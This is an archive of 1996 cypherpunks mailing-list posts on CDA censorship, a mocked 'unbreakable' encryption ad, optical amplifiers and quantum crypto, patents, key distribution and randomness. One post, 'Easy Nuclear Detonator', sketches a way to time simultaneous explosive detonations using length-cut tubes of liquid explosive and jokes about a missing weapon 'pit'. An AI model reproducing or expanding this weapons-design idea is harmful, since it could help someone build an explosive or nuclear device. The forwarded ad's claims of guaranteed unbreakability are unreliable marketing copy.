At 10:46 PM 2/18/96, yesim ozben wrote:
>Some news from Turkey. Up to now all connections to Internet were
>established and managed by TR-NET the collaboration of a university
>(METU) and the the national scientific research center (Tubitak).
>Recently the phone company opened a tender for this task and I think the
>same group or some company or foundation they were part of won it. Today
>I read that they are trying to pass some law for the net to be controlled
>by a monopoly and the reason is to be able to control things. So it's
>spreading.

I'm sorry to hear this, but it's predictable.

One of the worst aspects of the Communications Decency Act is that it
undermines criticism of similar acts in other countries. If Germany,
Turkey, Singapore, or China censor their computer users and establish
controls, critics will be met with a pointer to the U.S. policies. If even
the country that spends the most effort bragging about its love of liberty
is seen as censoring the Net, then surely it is a reasonable thing to do.

(We've seen similar cases in other contexts, where the United States boasts
about its free trade policies while forcing Canadians to reduce production,
or limits the amount of crops grown, etc. Other examples are readily
apparent.)

If the U.S. sees the need to control thoughtcrime, so will other countries.


--Winston Smith

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Morgan <sean@lucifer.com>
Date: Mon, 19 Feb 1996 09:47:41 +0800
To: cypherpunks@toad.com
Subject: Re: CDA outside US (Including Indian Reservations)
Message-ID: <2.2.32.19960219012151.006a34c4@lucifer.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp <erc@dal1820.computek.net> wrote:

>Another problem - if you ever want to get into the US, you can kiss that
>chance goodbye.  They might not even let you into the country as a
>visitor.  Stupid.

This is not an idle threat.  When Pierre Trudeau was elected prime minister
of Canada (1969?) there was some scrambling in the US to get him off the
_persona non grata_ list.  Seems that in his student days he had been busted
for trying to kayak from Florida to Cuba.  Canadian author Farley Mowatt
(sp?) was turned back at the border for imagined pinko associations (best
guess was that it was because he had traveled to the USSR to research _Sibir_).

Such a blacklisting would really hurt me in my current job.  I made about 15
business trips to the US (from Canada) last year.

>A fair number of Western countries have laws that say,
>in effect, that if you do something in your country that isn't illegal in
>your country but is in country X, then country X can bar you entry or PR
>status or citizenship based on the fact that is *is* a crome in country X. 

That makes no sense.  "Country Y would pass a law saying that country X may
bar you for something country X doesn't like"??  That's unnecessary on two
counts: Country Y has no jurisdiction in X, and X doesn't need Y permission
anyway.  Example, so called "sex tourist" from western countries travel to
the far east to have sex with minors.  You can't do it back home, but there
nothing to stop you from doing it abroad.  Or if you want an example closer
to home, how about Californians traveling to Nevada to gamble?
-------------------------------+-----------------------------------------
Sean Morgan (sean@lucifer.com) | Let me tell you a few bits about myself:  
                               |   CACTTGCCGGGTAACACTCCATGAAATTCTTCTCAGCC
http://www.lucifer.com/~sean/  |   AGGTGTCGACGCTAGGATCAACCTTTAAGTGAACT...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wink Junior <winkjr@teleport.com>
Date: Mon, 19 Feb 1996 12:02:38 +0800
To: cypherpunks@toad.com
Subject: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602190320.TAA15431@julie.teleport.com>
MIME-Version: 1.0
Content-Type: text


This culled from comp.security.firewalls.  I've edited out the blathering ad
copy and just left the "technical details".  Sounds like POTP Jr. to me; I'm
certainly not interested in the "buy our company" schtick.	-- Wink

         Wichita Falls, Texas
         February 16, 1996
         For immediate Release:
         Internet.Privacy.Guaranteed

	 [Long blathering sales prose elided.]

            If You Break our System, You've Bought our Company!

         Internet.Privacy.Guaranteed, IPG, today announced a new
         product line that guarantees privacy for 2, or privacy
         networks of 20,000 or more people on Internet. We back up our
         Guarantee with the Corporate motto, 'If You Break our System,
         You Have Bought our Company.'

         IPG Guarantees Absolute Privacy on Internet. Using the
         trademark CRE transform, the IPG PCX Nvelopes system
         translates any intelligible digitized information into
         utterly random gibberish. Only one other user, or more in
         certain instances where there is a need to know,  will have
         the Nvelopener required to transform the random gibberish
         back into intelligible digitized information. CRE Transforms,
         trademark IPG, are the only acknowledged unbreakable method
         of so transforming digitized information. There are no
         passwords, encryption keys, or anything like that to conjure
         up, remember, and perhaps forget. PCX Nvelopes usage is
         automatic, similar to PKZIP and PKUNZIP.   Easy to install,
         use, add to, and administer.

                        It is Unbreakable

         If an individual, or any group of individuals, break the IPG
         Privacy System, IPG will sell them the company for $1.00, and
         even give them the dollar to buy it with. If you think you
         can, just try and you find out that it is impossible. There
         may be rumors that someone has broken the system, but that is
         not possible, it will never happen.

                     Don't Waste your time !

         How dare IPG have the unmitigated gall? When you are certain,
         then you are certain, and IPG is certain! Others dare not
         make such a brazen boast because they cannot possibly back it
         up, but IPG most certainly can.  Every informed expert of the
         technology will confirm, without reservation, that the IPG
         system is not breakable, as many already have!  There, we
         have thrown down that gauntlet, dare you pick it up?

                               CRE Transforms

         The system uses CRE transforms, metaphorically called
         Nvelopes, to translate any meaningful digitized information
         into absolutely random gibberish.  In order to convert that
         random gibberish back into intelligible usable form, a
         Nvelopener is required, and only the rightful recipient(s)
         has the required Nvelopener.

                          Nvelopes and Nvelopeners

         Every Nvelope and Nvelopener pair is absolutely and totally
         unique - they bear no resemblance whatsoever to any other
         Nvelope - Nvelopener pair in existence, anywhere ay anytime.
         Every time a user wants to transmit information to another
         user, they utilize a new unique Nvelope.

                      No Passwords or Keys or the Like

         As an added bonus, there are NO MESSY, INTRUSIVE PASSWORDS or
         ENCRYPTION KEYS to conjure up, remember, fool around with,
         and perhaps forget. None of that sort of thing to bother with
         at all. Nothing to get in your way of using the system.

           Transforms Internet from Least Private to Most Private

         The System, called PCX Nvelopes, for Private Communications
         eXchange, transforms Internet from being the least private,
         utterly without any privacy at all, system for conducting
         communications, into the most private system possible, an
         elegant fast system that unequivocally insures privacy.

                         Privacy Network

         PCX Nvelopes serves 2 individuals who want to communicate
         with each other in private, as it serves equally well a
         corporate organization, or any other organization, privacy
         network, of 9 or 90,000 or more people, who want to keep
         customer, trade secret, strategy and plans, financial, and
         other confidential information privy to those with the need
         to know. For both in house and external usage.

                   Guaranteed Easy to Install, Use and Upgrade

         Potential users beset by a paranoia that the PCX Nvelopes
         system must be complex, difficult to configure, laborious to
         install, administratively burdensome, arduous to upgrade and
         add users, are in for a computer cultural shock.  As you will
         find, PCX is the exact antithesis of all of those things.  It
         is so simple to install, use, upgrade and add users to, that
         it will completely blow your mind away. There is nothing to
         do, installation and adding users are totally load and go
         operations - if you can operate a computer, you can install
         and use PCX Nvelopes within minutes, it is absolutely duck
         soup to any computer literate, even marginal ones.

                               Prices

         Prices are $19.96, including shipping and handling,
         for a full blown 12 user Demonstration system, unconditional
         moneyback guarantee and may be applied to your first order -
         the Demo system can be used by 2 people, or all the way up to
         12 users in a privacy network. For $39.95, two users can set
         up a two user privacy system with 500 Nvelopes.  A fully
         operational integrated multi-user system costs approximately
         $140.00 per user, ready to load and go, with thousands, or
         millions of Nvelopes and Nvelopeners. IPG also offers full
         turnkey leases at $15.00 per user, per network, per
         month, which includes all software, upgrades, administration,
         and unlimited Nvelopes and Nvelopeners.

         As a reference to its unbreakability, we refer you to an
         article by Paul Leyland on Internet at:

             http://dcs.ex.ac.uk/~aba/otp.html

         For more information visit our Web Site at:

             http://www.netprivacy.com/ipg

         or E-Mail at ipgsales@cyberstation.net,

         or by phone at 817-691-1081


                  Trademarks & Copyrights

         Nvelopes, Nvelopeners, CPX and CRE Transforms are trademarks
         of Internet.Privacy.Guaranteed, IPG.   Copyrighted 1995,1996
         by: Internet.Privacy.Guaranteed.  All rights reserved.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 19 Feb 1996 12:06:55 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Req. for soundbites
Message-ID: <199602190323.TAA19893@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>A local TV station has asked me for an interview, after I sent a graphic
>of a mono-digital hand gesture with the phrase "censor this!" to the Prez,
>Veep, and the area congresscritters (cc'd to 2 TV stations and a radio
>station), accompanied by a 'confession' and demand for swift prosecution.
>
>Anyone got any nifty sound bites I can try to toss in?

After following the information on the cda96-l mailing list I have a new
one for you, "The CDA means lost jobs and dead teenagers".

The lost jobs result from content providers going overseas and the dead
teenagers result from the loss of anonymously accessible information about
homosexuality (suicides) and AIDS prevention (AIDS).

OBcrypto - Strong anonymity can save lives.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Mon, 19 Feb 1996 09:35:10 +0800
To: acg@mandrake.cen.ufl.edu (Alexandra Griffin)
Subject: No Subject
In-Reply-To: <199602181818.NAA21065@mandrake.cen.ufl.edu>
Message-ID: <9602190113.AA23991@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Bob writes:
> 
> > Does anyone know if the new in-line optical amplifiers (not switches!) have
> > any effect on quantum crypto messages?

  Optical
> repeaters have to pass your signal through an intermediate electronic
> stage anyway, since we have no purely optical valve/transistor
> equivalents (bosons don't interact with each other at all).

	This is not true.   There is now a whole technology of optical
amplifiers for fiber communications systems that used Ettrium doped
fibers pumped with strong light from a laser at a slightly shorter
wavelength. These fiber optical amplifiers have gains in the order of
10-12 db in a section of special doped fiber only about 10 feet long.

	The current generation of undersea cables from the US to Europe
use these amplifiers instead of the more traditional regenerating
repeaters that convert the light to electronic signals, reclock the data
stream and convert it back to light with another laser diode.   There is
no conversion from light to digital electronic signals all the way from
Rhode Island to England - the same light pulses that go into the fiber
on one side of the Atlantic come out on the other end without ever
having been converted to electronic form in between.

	 These amplfiers have enourmous bandwidth, and can be used to
amplify several slightly different wavelengths of light allowing
wavelength division multiplexing of multiple streams of light flashes of
slightly different "colors" (all the current technology works at around
1500 nm which is well into the infrared).   This can expand the capacity
of a single fiber to four to six times the 5 Gb/sec that is the current
state of the art.

							Dave Emery
							die@die.com


























                                        

> 
> Can someone think of a reason why this wouldn't necessarily be so?
> 
> > Cheers,
> > Bob Hettinga
> 
> - alex
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 19 Feb 1996 12:49:59 +0800
To: acg@mandrake.cen.ufl.edu (Alexandra Griffin)
Subject: Re:
Message-ID: <199602190417.UAA23975@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:13 PM 2/18/96 -0500, Dave Emery wrote:
>> 
>> Bob writes:
>> 
>> > Does anyone know if the new in-line optical amplifiers (not switches!) have
>> > any effect on quantum crypto messages?
>
>  Optical
>> repeaters have to pass your signal through an intermediate electronic
>> stage anyway, since we have no purely optical valve/transistor
>> equivalents (bosons don't interact with each other at all).
>
>        This is not true.   There is now a whole technology of optical
>amplifiers for fiber communications systems that used Ettrium doped
>fibers pumped with strong light from a laser at a slightly shorter
>wavelength. These fiber optical amplifiers have gains in the order of
>10-12 db in a section of special doped fiber only about 10 feet long.

I don't think that it matters whether you convert to electronics or amplify
with laser techniques.  The cryptographic secret is kept in the quantum
uncertainity of the state of the (single) photon.  Anything that collapses
that quantum uncertainity acts as a man-in-the-middle and stops the key/OTP
generation.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 19 Feb 1996 10:03:24 +0800
To: cypherpunks@toad.com
Subject: Re: patents suck
Message-ID: <9602190134.AA08699@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


nobody@REPLAY.COM (Anonymous) wrote:

>Bullshit. Corporations do not work; their employees do.  The
>creativity of employees is sat upon as net worth, but nothing
>is produced.  Money is only worth something if it is circulating
>in an economy; a corporation only has worth if it produces
>something.
>
>Instead corporations produce nothing.  They sit on resources,
>preventing anyone else from producing, because the current system
>favors non-production and an inflationary and wasteful economy
>based on speculation.

Mmmmmhhh.  Although the state of affairs you point out in the above paragraph
unfortunately exist, your first paragraph denotes your vision of the world...

In today's economy, with a monetary system not backed by a physical standard,
it is true, in a sense.  Unfortunately.  


>>And the property rights *are* fundamentals (even if not

>No, they are not fundamental anything. They are taken for granted
>in the modern West as a rationale. It's a nice one, and I don't
>have too many arguments... except when people claim a false
>dilemma of either total private property or total socialism.

So, what other dilemna do you have to oppose to my false one?


>Why not a form of property based on use?
It is a contradiction in term.

>It was originally
>a rationale in Europe... <snip> ...despire the
>fact that natives and settlers lived there.

The fact that they might have rationalized thugish behaviour 400years ago 
is not relevant to the discussion.  Would you rape the next village's girls?
After all, it was certainly current practice 400 years ago, *somewhere* ...


>Extended to patents... corporations do a lot of R but no D, but
>legally no one else can make use of it either.  Unisys didn't
>market LZW compression and let everyone else use it... then they
>decided they should have been making losts of mulah and wanted
>to pull the plug and get royalities.  IBM has done negligable
>production on arithmetic coding, so a lot of independ developers
>ignore the patents.  Similar arguments can be made about PK
>crypto.

I won't comment on this one, since I do not accept that my morality be held hostage
by the actions of others.  I do not mean to absolve Corp. Inc that just tries to make
money through speculation rather than production.  But the argument does not even 
desserve an answer.  I am not a psycho-epistemologist...


>>You can not have your cake and eat it too...
>Huh? What does that have to do with this argument?

You cannot makes rules that protect a basic principle and at the same time have 
exceptions based on whims.  Because the latter will destroy the first.

**** NEW PGP 2.6.2 KEY *********
This key is actually suspended, as of Feb, 16 1996, was never distributed,
and might be subject to deletion.  Sorry for the trouble my mis-management might have caused.

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 19 Feb 1996 09:57:35 +0800
To: cypherpunks@toad.com
Subject: (DaveMail Fwd) Today's Proposal: Webmasters
Message-ID: <v02120d05ad4d7ac5e45e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
Date: Sun, 18 Feb 1996 09:09:07 -0800
To: malcolm@interval.com, ginas@hooked.net (Gina Smith -- SF Examiner),
        mark@wired.com (Mark Frauenfelder),
        RayHeizer@value.net (Heizer Software), davenetworld@wired.com,
        louise.link@applelink.apple.com (Louise Velazquez -- Oracle),
        Dan_Scherlis.ZIFF-DAVIS%LNGATE@zdmis.ziff.com (AT&T),
        Roz_Ault@bmugbos.org (Roz Ault), CummingsBu@aol.com,
        280-0309@mcimail.com (Tim Bajarin),
        CHAHIL@applelink.apple.com (Chahil, Satjiv)
From: dwiner@well.com (DaveNet email)
Subject: Today's Proposal: Webmasters
Sender: owner-davenetworld@wired.com
Precedence: bulk

---------------------------------------
Amusing Rants from Dave Winer's Desktop
Released on 2/18/96; 8:58:20 AM PST
---------------------------------------

  ***I'm not too proud

  If I have to beg and plead for sympathy.

  I don't mind because it means that much to me.

  If I have to sleep on your doorstep all night and day.

  Let my friends laugh -- even this I can stand!

  I'm not ashamed to come and plead with you baby.

  ***I ain't too proud to beg!

  The Temptations. Motown.

  The Internet. Now.

  What goes around.

  No, I ain't too proud to beg.

  Here's why!

  ***Why am I working on a Sunday morning?

  We're at a crossroads for the Internet medium. Will it be a
  narrow-channel one-way medium as the east coast people glibly claim
  it will be? Soap commercials, sensationalism, imitation
  friendship -- a continuation of the suburban culture of isolation,
  lies, dysfunction and unhappiness?

  Or will it be the medium of "Great Hair"? Of speaking and being heard?

  They're telling us to shut up! The chill is real. What are you prepared
  to do about it?

  ***I've made a proposal

  I decided to do something about it. I believe every voice makes a
  difference. I believe in the power of the Internet. It just needs a bit
  of organization. It needs someone to stick his or her neck out first.

  I listened to Howard Rheingold when he asked what we will tell our
  children ten years from now. I listened to Howard and I heard him. It
  gives me a chill! What *will* we tell them?

  Speaking for your kids, Mom and Dad -- what were you doing the week of
  February 18, 1996 that you couldn't spare some space on your home
  page, or spare a few hours to write down your own thoughts about
  freedom of speech?

  If not for the rest of us, do it for your kids. Write them a letter and put
  it in a time capsule. Show them later what you stood for today.

  People want to be spoon-fed. They're looking for mommy! I think the
  kids have more guts than us adults do. It's their future we're
  fighting for. Do you care enough to get involved? It's time to grow up.
  The opportunity is great, but so is the threat.

  No one spoon-fed the founders of our country. They fought a
  revolution for our right to free speech. You don't have to die for
  freedom, at least not yet. You just have to say you're in favor of it. A
  right that's not practiced is lost. Once it's gone, you *will* have to
  die to get it back, or worse, your kids will have to die!

  It's really simple. On February 22, everyone who cares about
  freedom, write an essay so everyone can see it. I don't care if you
  agree with me. It isn't a Dave Winer fan club. It's about numbers and
  voters. This is a two-way medium. We need to demonstrate that before
  it's too late.

  Companies like Microsoft and Netscape have a stake in the
  two-way-ness of this medium. Microsoft has FrontPage and Netscape
  has Navigator Gold. Both products are based on the assumption that
  lots of people will speak thru the worldwide web.

  Is it safe to do speak in this medium if the community standards of
  Memphis US apply to the writing of people in Paris FR? Judges in the US
  are deciding that every community's standards apply to every bit of
  writing on the web! Man. Talk about a chilling idea.

  How much do French people know about Tennessee? How much do they
  *want* to know? That's not a joke!

  They say it can't happen here. Over and over. It can. It's happening!

  Look, I'm angry with Bill Clinton for putting us in bed with the
  bible-thumpers. I feel very strongly about this. You may think
  Clinton did the right thing. Say so. Thanks to the work of some very
  fine people, it's easy to get your ideas on the web -- this week. Take
  advantage of this opportunity to really speak your mind. You may not
  get another chance.

  ***Today's proposal: Webmasters

  As the week goes by I will have more proposals. Today's message is
  directed at webmasters -- people who manage websites.

  Please learn about the 24 Hours project.

  It's totally non-commercial. We will share all the software we've
  developed for the project. There won't be any ads on this site.

  Browse around the website. Listen to me, then listen to your heart.
  Does free speech belong on your home page? Does your site support
  democracy? If so, link to the 24 Hours website so your users know where
  you stand. If you decide to link in at the last minute, say February 21,
  your users will complain that they didn't have enough time to prepare
  their essays. And they will be right!

  Honestly, right now, Sunday morning, the project looks like a
  failure. We've attracted some honest hardworking people who really
  care. The site you're looking at is a group effort. We had fun doing it.
  It was hard work for a good cause. I will be able to sleep knowing that I
  did everything I could for the cause of free speech. What about you?

  Dear webmaster, if you have to sell this inside your company -- sell
  it! Your president will thank you later, as Bud Colligan of
  Macromedia thanked me a few days ago. You can't afford to not stand up
  for free speech on the Internet.
  Your future, my future, their shareholder's future, the next
  generation's future -- they all depend on what you do right now.

  No, I'm not too proud to beg.

  So webmasters, I'm down on my hands and knees, begging -- get behind
  the 24 Hours of Democracy project! Today.

  Put a link on your home page.

  Give us a chance to organize free speech on the Internet.

  <http://www.hotwired.com/userland/24/iwantyou.html>

  Dave Winer

  PS: The next message is to reporters and editors, leaders and
  celebrities. It's the right time to write!

---------------------------------------------------------------
Webmasters: <http://www.hotwired.com/userland/24/iwantyou.html>

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 19 Feb 1996 13:21:49 +0800
To: acg@mandrake.cen.ufl.edu (Alexandra Griffin)
Subject: Re:
Message-ID: <m0toNKI-0008zmC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:13 PM 2/18/96 -0500, Dave Emery wrote:
>
>> 
>> Bob writes:
>> 
>> > Does anyone know if the new in-line optical amplifiers (not switches!) have
>> > any effect on quantum crypto messages?
>
>  Optical
>> repeaters have to pass your signal through an intermediate electronic
>> stage anyway, since we have no purely optical valve/transistor
>> equivalents (bosons don't interact with each other at all).
>
>	This is not true.   There is now a whole technology of optical
>amplifiers for fiber communications systems that used Ettrium doped
>fibers pumped

The proper name is "Erbium."  But the rest of Dave Emery's commentary is
accurate.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

Something is going to happen.    Something.....Wonderful!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSfqOPqHVDBboB2dAQH9vgP/X8sK3BdAwqf3clXxP31DZJqH6xLjMX3l
UxZSDsLOJ7MRrkJ3h2WV+cBXtu6ZA/zOOjmjh+o+U+b4rEPQrVWfj10LyV5uYC7l
Du9Sq6S3/qD9MVJLG5dTB3rnaLRh0alBWInyJBIJZz2Y7cjHJ+LCu7u++u39uLzv
V5WV2DSdWW8=
=QJ7q
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Mon, 19 Feb 1996 10:19:48 +0800
To: Laurence Lundblade <lgl@qualcomm.com>
Subject: Re: A brief comparison of email encryption protocols
Message-ID: <01I1DEYY5X76985M5A@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

LL> The Key Distribution System
LL> ---------------------------
LL> A lot of components may go into this (protocols, client/server
LL> architectures, local key stores) and it is probably the most
complicated
LL> part of any system.  Some options are:
LL>   * distribution of keys manually via e-mail
LL>   * automatic non-interactive lookup of keys from a server
LL>   * interactive browsing of a key store for keys
LL>   * revocation lists or none
LL>   * online certificate verification via a secure channel
LL>   * certificate caching

i would add, 
      * key expiration

LL> Probably the best thing to say, is that there's a lot of work to do
LL> here.

yup.


amp@pobox.com
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)
February 18, 1996   17:28


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSeoNYdTfgZXlXydAQGPQwf+IpKlmyt91gRtmdOcWeMZzX94qtppbiPB
wm1Xb6prxDgzI0jxuh+SnHMgEuvSa/flW6kqAkGQkZd7TsyX/J5lKA6fZB0umH1M
0LNj/Y9pubwbquHsd2EVyCoPe+f9+WO0HLCTEjd4yUJsBU6DDWGf61vxAvsUCyMK
F6Dpv7MPJBgNaHwsZOIgKR8yizkaFOzhgescm8a6FCVq/0iblTbZNDPr5EyMjIQC
VuZCDefcP5xQW9ve9yTidGbVhvYP0rKvtrov+U028U0q0ch2pztodpB9LCpXKhAh
/YFyqyTEqZLgNrwrhAE5N1qRpG7a34XJRLagMi5rIoMs+QAjps2k1w==
=/nJw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 19 Feb 1996 14:28:05 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Easy Nuclear Detonator
Message-ID: <m0toNuM-00091OC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:25 PM 2/18/96 EDT, E. ALLEN SMITH wrote:
>	I've been kind of busy recently (the reason I haven't responded to
>the more recent Assasination Politics stuff), but I'm curious what your method
>is for achieving simultaneous explosions.


"Multiple very thin flexible hollow tubes (1 mm ID? teflon?) filled with a
homogenous liquid 
explosive (for example, pure nitromethane), length accurately cut to produce 
the exactly desired delay.  Kept separated from each other by foam spacers 
to avoid inter-fiber detonations. Detonated from a single cap, with an 
intermediary chamber of liquid explosive to stabilize the shock front, the 
detonation wave travels along each tube simultaneously at (presumably) 
identical velocity."

It's a race, designed so that the detonation waves reach their targets (the
foci) at 
the same time.  If the detonation velocity was, say, 5,000 meters per 
second, an accuracy of 0.5 millimeter in length would produce a delay accuracy 
of 100 nanoseconds.

Whatcha think?

Now where did I put that pit...   <G>


Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSgFwvqHVDBboB2dAQGzYAQAksCklKTJ80tr+YuASwzt6KRMVgqivydf
wjYP9GL5Bo3HeXxEgOB8Xg6gnO9aOdDxMfMKiR0SdodE4V4kiy2y671jPofNz800
Y0YHzKnLcLuZzvnExGkhtLDQLigqDdNWSdPgFItkJ/5TVXHrEfL7+paOmo2hbYKO
5hbuG7wZ9Hg=
=6qoY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 19 Feb 1996 12:16:11 +0800
To: cypherpunks@toad.com
Subject: Sound Bites (finale)
Message-ID: <2.2.32.19960218153528.00676ab8@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Many thanks to those that posted/emailed sound bites, observations, information, etc. Some were used, some weren't (did what I could with what I had :-).

When asked why I was protesting the CDA the way I was, I just told them what popped into my head on the spot: 
"Because it's *my* Constitution, too."

Dave Merriman-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Sun, 18 Feb 1996 22:32:36 +0800
To: maruishi@netcom.com
Subject: Re: True random numbers
In-Reply-To: <199602172002.MAA09152@netcom20.netcom.com>
Message-ID: <199602181409.WAA01614@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <199602172002.MAA09152@netcom20.netcom.com>, 
  maruishi@netcom.com wrote:
> 
> I was trying to think of a way to come up with true random numbers...
> And knowing a bit of UNIX socket TCP/IP programming I made a small little
> program that generates random numbers by measuring the mili-second timing ies
>  a TCP packet to bounce back, from another network. 
>   My program simply send some data to port 7 (echo port) of a network on an i
> nternal list. Then timing it, randomly picks a different network to send to. 

Interesting idea. Trends may be externally visible, You would probably
want to normalize it, and you would find that there was quite a few
deterministic elements of network load -> delay.

Oh, did I mention clock granularity?

In short you really aren't going to get 'random numbers' from such a
scheme, but that's not to say you couldn't have fun playing with it,
you might even find some use for the ways of calculating immediate
network load around a node. Especially with regard to interception of
packets and allowing for time discrepancies whilst doing so.

Altogether off topic, but could maybe be developed into an idea with,
maybe a 30% change of being Perrygrammed. Keep working.

<invisible to perry>
Bounce me the code, could be interesting
</invisible to perry>

--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 19 Feb 1996 11:54:16 +0800
To: declan+@CMU.EDU
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
Message-ID: <01I1DHQJZMK0A0V3WD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh" 17-FEB-1996 18:07:51.71

>A lawsuit against the atheist would not be effective and could result in
>a countersuit for abuse of process.

	Huh? You seem to have misinterpreted what I said. The atheist, who has
a child that reads the net, sues a Christian Fundamentalist organization (say,
one of the Southern Baptist seminaries) for having a copy of the Bible - which
contains material that is among the "seven dirty words" or whatever - online,
where the child can read it. The CDA essentially says that a child reading
indecent materials is doing harm to the child (a nice bit of nonsense), which
gives the government the (undeserved) power to regulate such interactions.
A countersuit will be somewhat difficult, since the organization in question
(the one with the Bible online) is breaking the law; while there have been
burglar suing because of broken leg cases, I believe that such are generally
thrown out - possibly due to laws on the subject.
	Now, the jury won't find the seminary or whoever liable... but it would
create some publicity and tie the sued organization up for a while. It's
something that I'd encourage an atheist organization to sponsor.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 19 Feb 1996 12:11:28 +0800
To: wlkngowl@unix.asb.com
Subject: Re: Risks of a style anonymizer?
Message-ID: <01I1DHUB7FOMA0V3WD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"wlkngowl@unix.asb.com"  "Deranged Mutant" 17-FEB-1996 18:49:54.40

>One risk of "style anonymizers", though: if the style becomes too generic
>it's just another levelling of readability.  Usenet and mailing lists can
>become that much more boring, if not stupidified with too many spelling
>errors and grammatical abuses.

	Having style anonymizers that didn't create spelling problems, but just
filtered them out would be a solution to the latter. The former problem can be
taken care of by having many different styles that can be used. For instance,
